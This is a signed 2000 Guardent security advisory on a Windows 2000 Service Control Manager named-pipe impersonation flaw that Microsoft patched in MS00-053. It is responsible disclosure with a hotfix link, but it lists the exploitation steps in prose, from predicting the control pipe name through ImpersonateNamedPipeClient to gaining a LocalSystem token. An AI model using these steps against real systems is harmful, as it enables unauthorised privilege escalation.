-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 G U A R D E N T GUARDENT SECURITY ADVISORY secure digital infrastructure A0108022000 - ---------------------------------------------------------------------- - --------- Microsoft Windows 2000 Service Control Manager Named Pipe Impersonation Vulnerability August 02, 2000 http://www.guardent.com/A0108022000.html - ---------------------------------------------------------------------- - --------- - ----------------- EXECUTIVE SUMMARY - ----------------- A vulnerability in the way Windows 2000 handles named pipes allows any non-privileged user to elevate his or her current security context to that of an arbitrary service (started by the service control manager). By exploiting this bug, a non-privileged local user can gain privileged access to the system. - ---------------- AFFECTED SYSTEMS - ---------------- Guardent discovered and successfully exploited this vulnerability in Microsoft Windows 2000. Guardent's research and development team notified Microsoft when the vulnerability was initially found and worked with them to fix the problem. You can read Microsoft's advisory here: http://www.microsoft.com/technet/security/bulletin/ms00-053.asp. - ------------------- DETAILED DISCUSSION - ------------------- The vulnerability resides in the communication algorithm used to implement a client/server architecture between the service control manager (SCM) and the services started by the SCM. By exploiting this vulnerability, a malicious or unauthorized process has the opportunity to effectively become the server-end of a named pipe. A service, started by the SCM, will connect to the named pipe, and after becoming the server-end of the pipe, the process has the ability to impersonate the security context of the client connected to the pipe, which in this case is an NT Service. The first step involved in exploiting the vulnerability is to determine what the name of the next NT SCM control pipe will be. This name can be gleaned from the registry: HKLM\System\CurrentControlSet\Control\ServiceCurrent. Step two: increment the value and append it to the string: "\\.\pipe\net\NtControlPipe". Step three: create a named pipe using this name and wait for pipe clients. Step four: after the pipe has been created, instruct the SCM to start an arbitrary service. All services have a security descriptor associated with them that dictates to the SCM which users can perform which actions to the service in question. Included with the release of Windows 2000 are numerous services with a security descriptor that allows interactive accounts to start them, and which also run as LocalSystem. One example is "ClipBook". At this point, the service that was recently instructed to start has connected to the malicious pipe (rather than the SCM pipe as would normally do). Finally, the basic requirement for impersonation is to initiate a ReadFile call on the pipe. The malicious process now has the ability to impersonate the security context of the client by using the call ImpersonateNamedPipeClient. This effectively gives the malicious thread an impersonation token of the service that has connected to the pipe. The malicious process now has the opportunity to perform privileged operations under the security context of the service that has connected to the malicious named pipe. The process can now inject a remote thread, read process memory, or attempt to perform privilege elevation techniques to obtain administrator privileges. - ------ REMEDY - ------ Guardent notified Microsoft of this issue immediately after discovering and verifying the problem. As a result, Microsoft was able to locate the source of the vulnerability and create a hotfix to alleviate the problem. The hotfix can be downloaded from: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23432. - ---------------------- ADDITIONAL INFORMATION - ---------------------- To contact the Guardent R&D team, please send email to: ALL CONTENTS OF THIS ADVISORY ARE COPYRIGHT 2000, GUARDENT, INC. - ------------------- ABOUT GUARDENT, INC - ------------------- Guardent is a next-generation digital security services firm offering strategic solutions for technology-enabled enterprises. As a trusted security advisor, Guardent partners with clients to meet their requirements for the continuous innovation and development of their IT infrastructures, while mitigating the risks inherent in today's complex networked environments. Headquartered in the heart of Boston's technology corridor, Guardent has operations in Washington, D.C., Minneapolis, San Francisco, Seattle, Toronto, and London. Obtain more information on Guardent by calling 888.413.4344 or by visiting us on the web at http://www.guardent.com. Press contact: Dan McCall Executive Vice President, Guardent, Inc. dan.mccall@guardent.com 617.513.6623 Technical contact: Mike Schiffman Director, Research and Development, Guardent, Inc. mike.schiffman@guardent.com 888.413.4344 EOF Mike D. Schiffman Director of Research and Development Guardent, Inc. http://www.guardent.com -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.3 iQA/AwUBOYhJYAHhCsRVdxmnEQIG2wCg7/cFRgvcg9XzVw6e9/JRau4mqgcAoIu1 bQVxlfZFM4GW4QQbo7nnGN9z =4cfL -----END PGP SIGNATURE-----